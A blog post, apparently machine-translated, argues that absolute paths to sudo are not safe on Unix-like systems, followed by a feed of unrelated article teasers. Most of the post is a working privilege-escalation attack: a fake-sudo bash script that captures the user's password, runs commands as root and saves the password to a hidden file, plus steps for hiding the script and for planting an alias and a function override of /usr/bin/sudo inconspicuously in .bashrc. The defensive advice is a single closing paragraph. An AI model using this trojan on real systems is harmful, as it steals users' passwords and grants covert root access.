A Song of Ice and FireAlphaGoAntivirusArtificial IntelligenceBashBod PressBusinessCharityChatbotChildrenComputerConflict ZoneCouchDBEbola VirusFM ReceiverGame of ThronesGeolocationGeorge R.R. MartinGuideIncorporationInformation SecurityIoTJavaScriptLawLearningLinus TorvaldsMedicine Mental IllnessNewsNoSQLOperating SystemRansomwareRansomware DayReviewRevolutionRobotsSHA-1San FranciscoScienceSmall BusinessSolar EclipseTechnologyThe Fourth Industrial RevolutionThe FutureTime ManagementUnix-likeVanilla ForumsWana Decrypt0rWelcomeWordpressWorld Bank GroupZero-day Vulnerability

Is It Safe to Use an Absolute Path in The Unix-like Systems, as We Used to Think?

The idea of editing the user environment variables to elevate the rights in penetration testing is as old as the world. On this topic written many articles and even in books began appearing tips for using an absolute path instead of a relative. Here is an example of such a council from the relatively well-known book UNIX and Linux System Administration Handbook, 4th Edition:

You should take it as a rule with the command to specify the full name, such as /bin/su and /usr/bin/su, and not just su. This will serve as a specific protection from those programs with the name of the su, who deliberately had been prescribed in the path environment variable by an attacker intends to put together a good harvest password.

But is it safe? If you too are asked this question, you are welcome under the cut./p>

Let's order. Suppose we were on the unix-like server under a user account with limited rights. We want to get root access, but we do not know the password. For example, we tried all the usual methods of elevation through an error in the configuration and under the various exploits the kernel, but all to no avail. It would seem that no more options. However, if the user is in the group of the sudo, you can try to crank out one trick.

The idea is that on most unix-like machines sudo is used to elevate the rights temporarily. When using sudo user is required to enter his current password. Therefore, knowledge of the user's password to access to sudo gives us the root.

Almost all modern unix-like servers are using bash or zsh as the default shell. They have a config file (for example, .bashrc for bash), which are stored in your home directory. With their help, you can change almost everything in the shell environment. By default, they have the right to 644 (-rw-r ' r'). Therefore, the owner can edit them without any problems.

The bottom line is that the shells have alias`y with which commands can be shortened.

For example, the standard alias of .bashrc:

alias ll='ls -alF'

When calling ll actually ls -alF will be called. Similarly, we can proceed with sudo:

alias sudo='echo PWNED'

Then performing the sudo command on a relative path will cause what we have indicated in the alias.

Use slashes in the alias are not possible, therefore the absolute path really is a safe solution in this case. Just save the absolute path in the case of editing the PATH environment variable.

Now consider the case in which the absolute path is not a safe solution. In the configuration you can create functions that work similarly to alias except that slashes could be used in their names:

function /usr/bin/sudo() { echo PWNED }

Now the call /usr/bin/sudo will also execute our code.

The next stage is writing the script, which will behave similarly to the sudo (ask for the password and elevate user rights), but at the same time to intercept the user's password and execute arbitrary code with administrator rights.

In the end, we get the execution of the script when trying to invoke sudo through an absolute or relative path.

To get started let's writing the poisonous sudo code:

#!/bin/bash
echo -n "[sudo] password for $LOGNAME: "
read -s password

echo command='whoami'

eval "echo -e $password | sudo -S --prompt='' $command"
eval "echo -e $password | sudo -S --prompt='' $*"

It asks the user password in the sudo-style, and then stores it in a variable, executes our code with elevated privileges, and then does what the user wanted.

Now let's hide it in some inconspicuous directory (eg ~ / .local) and set it +x on the right execution (chmod + x sudo). What is the filename, in fact, does not matter to us, so it's better to call it too somehow unnoticed (e.g., .config).

With reading -s password, we read the password in the variable $password. The variable command = 'whoami' contains commands that we will perform with elevated privileges.

Construction echo -e $password | sudo -S is used here to convey our variable $password with the password to the sudo through stdin.

'prompt = ' needed to no real message 'enter the password' of sudo where displayed when we turn to it. Otherwise, it will look a little suspicious.

Now you need to find the full path to sudo using whereis. For example, /usr/bin/sudo. Let's correct .bashrc so that the sudo command and the /usr/bin/sudo run our script. To do this, write to .bashrc (somewhere in the center inconspicuously) the following code, which must be edited for yourself:

alias sudo='~/.local/.config'
function /usr/bin/sudo() { eval "~/.local/.config $*" }

Profit. Now we will try to save the user's password to a file. To do this, replace the current command.

command="echo $password > ~/.local/.1"

Everything worked out, qwerty123 is the user's password. It remains still a lot of special cases in which our script may behave incorrectly. For example, sudo su or sudo 'help. Since in this paper we consider only the possibility of implementing such an attack, the process of bringing it to shine, I shifted to the shoulders of the reader.

Now you know that the use of the absolute path to unix-like systems is not so safe.

Now the central question: how to protect themselves from possible attacks? In my opinion, the best option would be to allow editing .bashrc only under root. Of course, there is a second choice, but it is less convenient and safe: to constantly check the integrity of the configs.

Related Coverage

There are certain new technologies that are very much on trend at the moment. These are techs that dominates conversations and is at the centre of media excitement, leading to much hype, fevered speculatio.

22

Ever since the space race (that ended in 1969) territories beyond Earth have been deemed to be one of final frontiers of human conquest. But how possible is it that space travel .

23

In the grand scheme of things, human life has not existed on earth for very long. While many species, such as crocodiles, date back 200 million years, modern humans have only been around for some 200,000 years. Despite our shor.

18

(Technology 3D print car via Pixabay) When it comes to new technology, I often find myself asking whether or not it is really necessary. The need for convenience in a fast-pac.

49

(Img src: Max Pixel) One of the biggest technological advancements of our time is 3D.

60

(Sunrise space outer via Pixabay) It seems almost a lifetime ago that the US and Russia were locked in a desperate struggle to reach space. Fifty years hence, and it seems we .

120

Free Antivirus Software Over 8 years have gone after Windows 7 was introduced it's as yet the most mainstream Windows out there. In any case, the sudden rise of the substantial scale ransomware disease demonstrated to us some unquestionable security escape clauses in Microsoft's fan top choice. Fundamentally, a lot of clients set aside the way that the obsolete Security Essentials ca.

100

The Internet of Things has had a huge impact on the way many industries are approaching the future, with lots of research centred around IoT, and the success of smartwatches has shown the clear potential in wearable technology. Combining IoT with clothing makes a lot of sense, as it takes advantage of items that are on our person for long periods of the day. Over the next few years, wearable te.

97

October 4th, 1957: the Soviet Union launched the very first satellite, Sputnik 1, into Space. It was the first time humanity had sent any object in to space. Twelve years later, in July 1969, Neil Armstrong became the first person to walk on the moon, paving the way for increasingly bo.

241

Although there have been many smaller developments, and numerous aesthetic changes along the way, the face of transportation has looked fairly similar for the past few decades. Despite promises of hover cars, our roads are still lined with four-wheeled vehicles, trains still run on tracks, and planes are still cramped and noisy. There have been advancements, and in the next few years you can ex.

117

Legal issues At some point in life, everyone gets an idea of starting their own business – be it that of dealing in diamonds, opening a restaurant or simply starting a bar they always wanted to open! It is always exciting to start a small business of your own and dreaming about it.

284

One of the most challenging tasks in computer programming is developing an OS and frankly, is not for everyone except the most hard core geekheads among you. In order to start with creating your very own OS let us start by viewing the basic definitions of what a BIOS or boot loader is and does. An operating.

292
January 20, 11 AM
AlphaGo Beginner's Guide

AlphaGo Everyone knows that DeepMind's AlphaGo defeated 18 times world champion Lee Sedol on March 9 2016 at the ancient Chinese game- Go. What’s fascinating is that the game of Go has as many possible moves as there are atoms in the universe. This motivated us to find out more about AlphaGo.

388

Last month, the World Bank Group published the World Development Report (WDR) 2018, the first-ever edition entirely focused on education. The report warns of a learning crisis in global education and the severity of this in the deprived areas. Shockingly, there are still around 260 million children who aren’t even enrolled in primary or secondary schools. Education is meant to equip stud.

269

Medicine is the most rapidly growing area of expertise. In recent decades, new technologies and scientific discoveries have changed the idea of the body and its diseases and at the same time the approach to the treatment of the whole person.

486

he World Health Organization estimates that about 300 million people around the world are suffering from depression, 60 million from bipolar affective disorder, and 21 million from schizophrenia.

336

The Internet of Things The first three industrial revolutions were triggered by steam, electricity, and, and wired computers which transformed people’s way of life and manufacturing and brought digital capabilities to billions of people.

518

Opening your own business is a task that is certainly difficult and responsible, but experienced entrepreneurs will agree that real difficulties come when you start developing an already launched project.

250

Automation of business processes is no longer just an evolving trend in digital marketing. Today it is an integral part of a brand communication.

269

We all have stories about working in dysfunctional offices, with wacky colleagues and under stressful deadlines. But even this cannot compare to working in a conflict zone, a place that is ravaged by war.

533

Game of ThronesGeorge R.R. Martin is an American novelist, fantasy, sci-fi and short story writer. Most of the world got acquainted with him after screen adaptation of his epic saga "a Song of Ice and Fire".

449

Over the last years the art of time management gains popularity. Why so? The answer is very simple: we want to control our life. No wonder there are plenty of interesting techniques allowing us to properly schedule and manage our time.

245

Ebola Virus The Ebola virus causes a severe illness that is often lethal in the absence of treatment.

694
July 11, 09 AM
Welcome to Bod Press

Bod Press is a global social network for readers, journalists and companies engaged in writing and reading. The unique audience, fresh information, constructive communication, and collective creativity.

667

Bod Intelligent Antivirus This review is dedicated to the Bod Intelligent Antivirus developed by Bod Security. The purpose of the article is to show its functionality and demonstrate how it behaves in real conditions.

847 2

wordpress Automattic Company, the developer of WordPress, will no longer spend money on maintaining the office in San Francisco.

937

Computer Technology It seems that many years have passed, which made an eternity by the standards of the world of computer technology. And the reflection on past mistakes does not stop. And what would have happened if...

529

Robotic assistant Millions of American families buy automatic voice assistants to turn off the lights instead of themselves, order pizza and show movie program in the cinema.

522

The data about critical vulnerabilities in WordPress were published - they allow remote execution of shell commands and resetting the administrator password through the substitution of the Host header.

1051 1

More than 60,000 computers were attacked and infected with a virus-extortionist Wana Decrypt0r.

446

At some time, I had to work with one of the document-oriented DBMS – Apache CouchDB, but I had some difficulties with the search of the documentation.

1701

The article describes how to work with push notifications about object events in browsers.

415

Imagine that you are sitting and waiting for someone in the car, and the poster of your favorite group has caught your eye.

408

We will organize the small distribution of free stuff for those who aspire to bring something good, kind, wise, and eternal to children.

365

Google's co-workers and the Centre of Mathematics and Computer Science in Amsterdam, presented the first algorithm generating collisions for SHA-1.

1137
Never miss a story by James Monroe, when you sign up for Bod Press.
Sign up